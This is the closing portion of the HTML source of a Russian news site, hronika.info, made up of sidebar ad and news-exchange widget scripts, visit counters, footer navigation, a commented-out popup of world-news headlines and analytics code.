	<strong title="Названа привычка, способствующая быстрому похудению">Названа привычка, способствующая быстрому похудению</strong></a><b>14101</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div>
		</div>			         
	</div>
</div>
 <div class="clr"></div>
 
					
</div>

            
  
          
          <div class="wrap">
              <div id="bn_9bfe796fdf">загрузка...</div>
<script type="text/javascript" src="//recreativ.ru/rcode.9bfe796fdf.js"></script>
              <h3>Интересные новости</h3>
              <!-- noindex --><div id="n4p_31957">Loading...</div>
<script type="text/javascript" charset="utf-8">
  (function(d,s){
    var o=d.createElement(s);
    o.async=true;
    o.type="text/javascript";
    o.charset="utf-8";
    if (location.protocol == "https:") {
      o.src="https://js-ru.redtram.com/n4p/0/31/ticker_31957.js";
    }
    else {
      o.src="http://js.ru.redtram.com/n4p/0/31/ticker_31957.js";
    }
    var x=d.getElementsByTagName(s)[0];
    x.parentNode.insertBefore(o,x);
  })(document,"script");
</script><!--/ noindex -->
              <!--noindex -->
<!-- MarketGidNews Start -->
<div id="MarketGidScriptRootN8362" class="news-block-magick">
    <div id="MarketGidPreloadN8362">
        <a id="mg_add8362" href="http://usr.marketgid.com/demo/celevie-posetiteli/" rel="nofollow" target="_blank"><img src="//cdn.marketgid.com/images/marketgid_add_link.png" style="border:0px"></a><br>        <a href="http://marketgid.com/" rel="nofollow" target="_blank">Загрузка...</a>    
    </div>
    <script>
                        (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("MarketGidScriptRootN8362")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("MarketGidScriptRootN8362");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=8362;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsn.marketgid.com/h/r/hronika.info.8362.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
    </script>
</div>
<!-- MarketGidNews End -->
<!--/noindex-->
              <!--noindex-->
<!-- LentaInformNews Start -->
<div id="LentaInformScriptRootN14129" class="news-block-magick">
    <div id="LentaInformPreloadN14129">
                <a href="http://lentainform.com/" target="_blank">Загрузка...</a>    
    </div>
    <script>
                        (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("LentaInformScriptRootN14129")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("LentaInformScriptRootN14129");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=14129;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsn.lentainform.com/h/r/hronika.info.14129.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
    </script>
</div>
<!-- LentaInformNews End -->
<!--/noindex -->
              <div class="join_informer_3674" id="join_informer_3674"></div>

<!-- Асинхронный код, 10.02.2016 -->
<script type="text/javascript">  (function() {
var i = document.createElement("script"); i.type = "text/javascript";
i.async = true; i.charset = "UTF-8";
i.src = "//partner.join.com.ua/async/3674/";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(i, s);
})();</script>
<!--  News Join -->
             </div>		        
          
          
          <div class="wrap">
            	<h3>Мы в Фейсбук</h3>
              <!--noindex--><div class="fb-page" data-href="https://www.facebook.com/Hronika.info/" data-width="300" data-height="220" data-small-header="false" data-adapt-container-width="true" data-hide-cover="false" data-show-facepile="true"><blockquote cite="https://www.facebook.com/Hronika.info/" class="fb-xfbml-parse-ignore"><a href="https://www.facebook.com/Hronika.info/">Хроника мировых событий</a></blockquote></div><!--/noindex-->
			</div>
          
        
          <!--<div class="wrap">
            	<h3>Наш опрос</h3>
		        
			</div>
        -->
       
       		   </div>

            
  
                 
      </aside>
                      <div class="fullstory_bottom">
         <div class="bshadow">
		 
         <div class="clr"></div>
         </div>
      </div> 

        </section> 
      </div>
      <footer id="footer">
        <div class="maxw">			<nav class="footbut">
				<ul class="clr reset">
				    <li><a href="/politika/" >Политика</a></li>
					<li><a href="/ekonomika/" >Экономика</a></li>
					<li><a href="/tehnologii/" >Технологии</a></li>
					<li><a href="/avto/" >Авто</a></li>
					<li><a href="/obwestvo/" >Общество</a></li>
					<li><a href="/otdyh/" >Отдых</a></li>
					<li><a href="/neverojatnoe/" >Невероятное</a></li>
					<li><a href="/nedvizhimost/" >Недвижимость</a></li>	
					<li><a href="/videonovosti/" >Видеоновости</a></li>
                    <li><a href="/fotoreportazhi/" >Фоторепортажи</a></li>						
				</ul>					
				<ul class="clr reset">
					<li><a href="/rossija/" >Россия</a></li>
					<li><a href="/ukraina/" >Украина</a></li>
					<li><a href="/mir/" >Мир</a></li>
					<li><a href="/kultura/" >Культура</a></li>					
					<li><a href="/sport/" >Спорт</a></li>
					<li><a href="/medicina/" >Медицина</a></li>					
					<li><a href="/greenpeace/" >Гринпис</a></li>
				    <li><a href="/kriminal/" >Криминал</a></li>
					<li><a href="/igry/" >Игры</a></li>
					<li><a href="/videoigry/" >Видеоигры</a></li>					
				</ul>
			</nav>
            <a href="#"><img src="/templates/hronika/images/banners/footrekl.png" alt="Реклама" class="footrekl" /></a>
            <div class="clr5"></div>
            <div class="copyright_f"><p>Новостное интернет издание Хроника мировых событий - всегда только горячие и интересные новости со всей планеты. Все самые свежие события, происшествия, достижения и открытия мира освещаются на нашем сайте специально для вас. Копирование и использование информации с сайта Хроника инфо разрешается при условии прямой, открытой для поисковых систем гиперссылки на наш сайт. <span>hronika.info &copy; 2012-2018</span></p></div>
            <div class="counts">
            <nav class="footbut2">
            <ul class="clr5 reset">
              <li><a href="http://hronika.info/o-nas.html">О нас</a></li>
              <li><a href="http://hronika.info/sitemap.xml">Карта</a></li>
              <li><a href="http://hronika.info/vakansii.html">Вакансии</a></li>
              <li><a href="http://hronika.info/konakt.html">Контакты</a></li>
            </ul>   
                
            </nav>
            <!--noindex-->
              <div class="count"><!--noindex-->
<!--LiveInternet counter--><script type="text/javascript">
document.write("<a href='//www.liveinternet.ru/click' "+
"target=_blank><img src='//counter.yadro.ru/hit?t17.12;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";h"+escape(document.title.substring(0,150))+";"+Math.random()+
"' alt='' title='LiveInternet: показано число просмотров за 24"+
" часа, посетителей за 24 часа и за сегодня' "+
"border='0' width='88' height='31'><\/a>")
</script><!--/LiveInternet-->
<!--/noindex--></div>
              <div class="count"><!--noindex-->
<!-- I.UA counter --><a href="http://www.i.ua/" target="_blank" onclick="this.href='http://i.ua/r.php?165947';" title="Rated by I.UA">
<script type="text/javascript"><!--
iS='http'+(window.location.protocol=='https:'?'s':'')+
'://r.i.ua/s?u165947&p164&n'+Math.random();
iD=document;if(!iD.cookie)iD.cookie="b=b; path=/";if(iD.cookie)iS+='&c1';
iS+='&d'+(screen.colorDepth?screen.colorDepth:screen.pixelDepth)
+"&w"+screen.width+'&h'+screen.height;
iT=iR=iD.referrer.replace(iP=/^[a-z]*:\/\//,'');iH=window.location.href.replace(iP,'');
((iI=iT.indexOf('/'))!=-1)?(iT=iT.substring(0,iI)):(iI=iT.length);
if(iT!=iH.substring(0,iI))iS+='&f'+escape(iR);
iS+='&r'+escape(iH);
iD.write('<img src="'+iS+'" border="0" width="88" height="31" />');
//--></script></a><!-- End of I.UA counter -->
<!--/noindex--></div>
              <div class="count"></div>
              <div class="count"></div>
            <!--/noindex--></div>
      </footer>
      <a href="#top" id="goTop" class="go-top"><img src="/templates/hronika/images/up.png" alt="наверх" title="Подняться наверх" /></a>
      
<!-- popup     
      <div class="news-bot-show">
        <div id="dim7">
          <div class="msgbox7">
            <div class="msgboxttl7">
              <b>Материалы в разделе&nbsp;



МИР
















</b>
              <a class="close7">X</a>
            </div>



<div class="vsplivayushee-okno">
    <span class="spandate">02.10-01:15</span>
	<strong title="У правительственного здания в Барселоне прошли стычки"><a href="http://hronika.info/mir/356212-u-pravitelstvennogo-zdaniya-v-barselone-proshli-stychki.html">У правительственного здания в Барселоне прошли</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">02.10-00:09</span>
	<strong title="Трамп прокомментировал свое отношение к алкоголю"><a href="http://hronika.info/mir/356206-tramp-prokommentiroval-svoe-otnoshenie-k-alkogolyu.html">Трамп прокомментировал свое отношение к алкоголю</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">01.10-23:00</span>
	<strong title="В Италии обвинили чиновников ЕС в "рыночном терроризме""><a href="http://hronika.info/mir/356194-v-italii-obvinili-chinovnikov-es-v-rynochnom-terrorizme.html">В Италии обвинили чиновников ЕС в "рыночном</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">01.10-21:42</span>
	<strong title="В МИД РФ прокомментировали провал референдума о смене названия Македонии"><a href="http://hronika.info/mir/356182-v-mid-rf-prokommentirovali-proval-referenduma-o-smene-nazvaniya-makedonii.html">В МИД РФ прокомментировали провал референдума о</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">01.10-20:46</span>
	<strong title="Британия отправляет своих солдат к границе России"><a href="http://hronika.info/mir/356173-britaniya-otpravlyaet-svoih-soldat-k-granice-rossii.html">Британия отправляет своих солдат к границе России</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">01.10-19:32</span>
	<strong title="В Китае открыли удивительный мост над морем"><a href="http://hronika.info/mir/356161-v-kitae-otkryli-udivitelnyy-most-nad-morem.html">В Китае открыли удивительный мост над морем</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">01.10-18:26</span>
	<strong title="Во Франции скончался знаменитый шансонье"><a href="http://hronika.info/mir/356137-vo-francii-skonchalsya-znamenityy-shansone.html">Во Франции скончался знаменитый шансонье</a></strong>			
</div>





















            <hr />»
            <a href="/">Перейти на главную</a>
          </div>
        </div>
      </div>
-->
      
    <div id="fb-root"></div>
      <script type="text/javascript">	
$(document).ready(function(){$("#newstab2, #listalka_tab, #rightbl_tab, #ax_popular_obs, #ax_popular_comp").easyTabs({defaultContent:1})});$(document).ready(function(){$("#slider3").tinycarousel({pager:true,interval:true})});$(document).ready(function(){$("#dim7").css("height",$(document).height());$(".alert7").click(function(){$("#dim7").fadeIn();return false});$(".close7").click(function(){$(".news-bot-show").remove();return false})});$(window).bind("resize",function(){$("#dim7").css("height",$(window).height())});
$(document).ready(function(){$("div.short_2").addClass("alt");$("div.short_2_clr:even").addClass("alt")});
    </script>
<div id="fb-root"></div>

	<script type="text/javascript" src="/templates/hronika/js/libs.js"></script>
	<script type="text/javascript" src="/templates/hronika/js/orating_pack.js"></script>
        <!--[if IE]>
	<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
	<![endif]-->
	<!--[if IE 8]><link href="/templates/hronika/css/ie8.css"  rel="stylesheet" media="all" /><![endif]-->
<script>
(function(i,s,o,g,r,a,m){i["GoogleAnalyticsObject"]=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date;a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)})(window,document,"script","//www.google-analytics.com/analytics.js","ga");ga("create","UA-48298212-1","hronika.info");ga("send","pageview");
</script>

<script>window.RESOURCE_O1B2L3 = 'leokross.com';</script>
<script src="//leokross.com/ED9.js" ></script>
 
</body>

</html>
<!-- DataLife Engine Copyright SoftNews Media Group (http://dle-news.ru) -->
